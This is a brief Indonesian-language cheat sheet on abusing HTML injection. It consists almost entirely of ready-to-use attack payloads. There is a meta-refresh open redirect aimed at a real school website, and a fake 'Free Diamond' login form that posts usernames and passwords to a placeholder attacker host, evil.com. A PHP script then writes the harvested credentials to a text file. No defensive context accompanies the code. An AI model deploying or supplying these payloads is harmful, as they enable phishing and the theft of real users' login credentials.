Html injection

 Memanfaatkan html injection

Open redirect

><meta http-equiv="Refresh" content="0; url='https://gloriaschool.org'" />

 

Phising

<br><br>
<center>
    <i><h1>Free Diamond</h1></i>
    <table style="border:2px solid black; border-radius:12px;">
        <tr>
            <td><p><p style="margin-left:10px;margin-right:10px;">Username: </p></p></td>
            <td><form action="evil.com/index.php" method="POST"><input style="margin-top:20px;" type="text" placeholder="Username..." name="username"></td>
            </tr>
            <tr>
                <td><p style="margin-left:10px;margin-right:10px;">Password: </p></td>
                <td><input style="margin-top:5px;margin-right:10px;" type="text" placeholder="Password..." name="password"></td>
            </tr>
            <tr>
                <td></td>
                <td><input style="margin-top:20px;" type="submit" value="Kirim" name="submit"></form></td>
            </tr>
        </table>
    </center>
<br><br>

catch user input

<?php  
$file = "ini.txt";
$username = $_POST['username'];
$password = $_POST['password'];
if (isset($username) && isset($password)) {
      $isi = "\nUsername = $username \n passsword = $password";
      $buka = fopen($file, "a");
      fwrite($buka, $isi);
      fclose($buka);
}
?>
?>